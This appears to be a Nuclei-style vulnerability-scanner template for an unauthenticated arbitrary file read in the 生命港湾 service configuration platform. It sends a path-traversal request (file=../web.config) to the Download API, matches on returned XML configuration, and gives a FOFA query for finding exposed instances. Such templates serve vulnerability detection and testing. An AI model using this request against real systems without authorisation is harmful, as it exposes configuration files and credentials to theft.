http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <?xml version="1.0"
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /api/File/Download?file=../web.config HTTP/1.1
          Host: {{Hostname}}
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Priority: u=0, i
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
          Accept-Encoding: gzip, deflate
          Upgrade-Insecure-http: 1
id: Life-Harbor-Download-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="css/markdown.css" && body="icon-512.png"
        生命港湾服务配置工具平台 Download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态
    name: 生命港湾 服务配置工具平台 Download 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/BOst1UK_fdq3v5RTNiV-UQ?token=968846615&lang=zh_CN
    severity: high
    tags:
        - File reading
